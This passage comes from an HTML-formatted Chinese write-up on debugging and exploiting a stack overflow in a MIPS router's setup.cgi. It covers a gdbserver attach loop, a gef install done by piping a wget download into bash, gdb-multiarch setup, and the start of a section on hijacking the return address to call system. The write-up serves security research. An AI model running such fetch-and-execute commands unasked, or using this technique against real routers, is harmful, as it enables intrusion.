ahrLc84hF7hSbnNc8p/8J//Jf/Kf/Cf/yb9kJP/Jf/Kf/Cf/pzf/HZs6VKK0K0eFaKyOUzEZWAKHyUvlSpcWUQc6l4YwgDMzM5XzVCQ4TsdKD2xi0HjZHOfmjjVtp99KUHkx9OQnHJybQecYn4fxIigEx8fQJj9WKqIsOJTP+zlpG3cU3Z+KgecH5bJ5PjBXPW7sW/Il5/EcYq53A4cFkn6lXNpAEB1K7+/574XMCwplKlZemOQH7ipTLy/eyX/yn/wn/4xJ8h+VH5P/5D/5T/5pe/Kf/FMubUj+k/+fFf8dmzqe3BJIY6UUd7/Yr+QgBtKVZZJ1e+9OomwWBzqPxYzz+mVRniS0z5NZNjMYpSBpTgbC9eJ4HadvaKvb461bYWTgS7EowaP5CRyLrxcR94sfo081dzffl+JOmYwlbSotSJTFxHeZjGcpb7otkFyoui0A3p86ue7d8k1FyBc7yuF8fk+xjnH3uLSQuMzkP/lP/pP/5D/5T/6T/+Q/+U/+k//k//Tmv7apo3
|
|||
|
|
<h4 blockindex=52>附加二进制的坑点</h4>
|
|||
|
|
<p blockindex=53>由于setup.cgi不是持久存在的,需要循环attach,这个脚本可以解决。</p>
|
|||
|
|
<pre blockindex=54><code class="hljs language-sh">int=1
|
|||
|
|
<span class=hljs-keyword>while</span> [ <span class=hljs-variable>$int</span> -le 1000 ]; <span class=hljs-keyword>do</span>
|
|||
|
|
/tmp/gdbserver 0.0.0.0:12345 --attach `ps -A | grep setup.cgi | awk <span class=hljs-string>'{print $1}'</span> | head -n 1`
|
|||
|
|
<span class=hljs-keyword>done</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<h3 blockindex=55>调试端配置</h3>
|
|||
|
|
<p blockindex=56>环境: Ubuntu 21</p>
|
|||
|
|
<h4 blockindex=57>安装gef</h4>
|
|||
|
|
<p blockindex=58>gef是异构动态调试做的比较好的一款gdb插件,推荐使用。</p>
|
|||
|
|
<pre blockindex=59><code class="hljs language-sh">bash -c <span class=hljs-string>"<span class=hljs-subst>$(wget http://gef.blah.cat/sh -O -)</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<h4 blockindex=60>安装gdb-multiarch</h4>
|
|||
|
|
<p blockindex=61>普通的gdb无法调试mips架构的二进制,所以你需要gdb-multiarch,Ubuntu的话直接使用apt就可以进行安装了。</p>
|
|||
|
|
<pre blockindex=62><code class="hljs language-php">sudo apt install gdb-multiarch
|
|||
|
|
</code></pre>
|
|||
|
|
<h4 blockindex=63>gdb调试配置</h4>
|
|||
|
|
<p blockindex=64>为了让gdb正确进行调试,首先需要进行一下环境配置。</p>
|
|||
|
|
<pre blockindex=65><code class="hljs language-sh"><span class=hljs-built_in>set</span> arch mips
|
|||
|
|
<span class=hljs-built_in>set</span> endian little
|
|||
|
|
gef-remote 192.168.1.1:12345
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=66><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=67>在调试过程可以断到gadget,以及加载libc符号,如果觉得每次敲gdb命令比较繁琐,可以将gdb的命令保存成文件,然后在使用<code>gdb-multiarch</code>通过<code>-x</code>选项直接通过文件加载命令:</p>
|
|||
|
|
<pre blockindex=68><code class="hljs language-sh"><span class=hljs-built_in>set</span> arch mips
|
|||
|
|
<span class=hljs-built_in>set</span> endian little
|
|||
|
|
gef-remote 192.168.1.1:12345
|
|||
|
|
b *0x555BAC2C
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=69><code class="hljs language-sh">gdb-multiarch setup.cgi -x ./gdb.cmd
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=70>IDA反汇编出来的base可能跟实际基址不一样,可以调出实际的基址再rebase一下。</p>
|
|||
|
|
<p blockindex=71><img src=data:image/png;base64,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
|
|||
|
|
<h2 blockindex=72>漏洞利用</h2>
|
|||
|
|
<h3 blockindex=73>函数栈</h3>
|
|||
|
|
<p blockindex=74>mips调用函数时将返回地址放在 <code>$ra</code>,与x86架构类似,在函数起始处压栈,结束时弹出,通过<code>ja</code>指令跳到返回地址,所以需要溢出到<code>var_s24</code>来劫持控制流。</p>
|
|||
|
|
<p blockindex=75><img src="data:image/png;base64,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
|
|||
|
|
<h3 blockindex=76>执行system</h3>
|
|||
|
|
<p blockindex=77>介绍一下 mips 下神奇的函数调用:</p>
|
|||
|
|
<p blockindex=78><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABBAAAAD3CAYAAACka6fZAAAgAElEQVR4nOydZ2AdxfW3n223F92r3izLvXewsY1pxhRTAwmdUEMgCckLIYReQyBAgEBCSWihhA4JYGODe8W9W7JlS7J6uZJub1veDzK2ZcnYgAnwzz7+ZN2d3TO7s7MzvzlzjmAYhsH/KPX19VitVmRZ/q5NMfkSEokEoihisVi+a1NMDoFQKITD4TDfqx8Auq4Tj8ex2+2Iovhdm2NyEOLxOLIsoyjKd22KySEQCoVwOp1IkvRdm2JyEDRNI5lMYrfbEQThuzbH5CDEYjEURTH7wh8AhmEQiURwOBxmX/gDIJ1Oo6oqNpvtS/tCc8RoYmJiYmJiYmJiYmJiYmJyUEwBwcTExMTExMTExMTExMTE5KD8T/sYp9NpNE37rs0wOQipVApRFE2X+B8IkUgEXddNl/gfAIZhkEgkUFXVdNv9AZBMJpFl2XQD/YFg9oU/HHRdJ5VKkU6nzb7wB0AikUBRFLMv/IEQjUbRNM3sC38AaJqGqqqk0+kvPa7bjOyLCXU0ZbArpGJXRMT/o31pXUinrq4G3dC/a1NMvgRDNzAwzI7nB4Ku6wgICP9XO47/QxiGsWeCYw6av/+YfeEPCGN3XyiYfeEPAcMwMPTd75b5uL73GLqOAWZf+EPgi75QFMxxxg+AQ+0Lhf2DKIbDYXRdZ1NLmsdWxDii0I5VNl9QExMTExMTExMTExMTE5P/ZQ7oE+5QRMYXO7hwpBeXxRQQTExMTExMTExMTExMTEz+lzmggCAKYJMFPFYJt9UUEExMTExMTExMTExMTExM/pcxlQETExMTExMTExMTExMTE5ODYgoIJiYmJiYmJiYmJiYmJiYmB8UUEExMTExMTExMTExMTExMTA7KAWMgHBYMHUNL0drSiGD1YHf7cSrf6hW/GlqacKiNaCKF3V+MSwHp25BUdJV4NERTUz2haBoDG54MH7n5WdgVqee0JrpGKhGlqamWjnAKzVBwujIoKMrFpkhIPaWFMnS0VJympjraQ3HSqoTN7qGgOBeHzYK8X5lIR4BASxOBcKJHsxWHB39mJoXZvt02pWgPtFJb04gKfJG+QxAkZMVJTl42Xo8Tm+UAzUpL0d7WTGugjUhcQ5Jd5ORl4/N5umX6SKcSBBpqCIRiJNNat1NJihWbJ5OS/Exslq6NSleThNvbaW5sIaqqiJKE05OBLysbn9N2WNLIVC7dwJNvVlDTujdPqj3Dyfgzj+C6abk/uCxQyXiKQFOQQFglrRndfpcsCi6vnZI8J7IkgKGTiCXZuSNIStfZNxGqLCtk+OxkZtpx2g6Qo1nXiYbjNLeECUYNBFEiw+cgJ8eBzSJ2u3+Bxg4CHUkiie5tQRAErG4HBdkOMtxd24Kh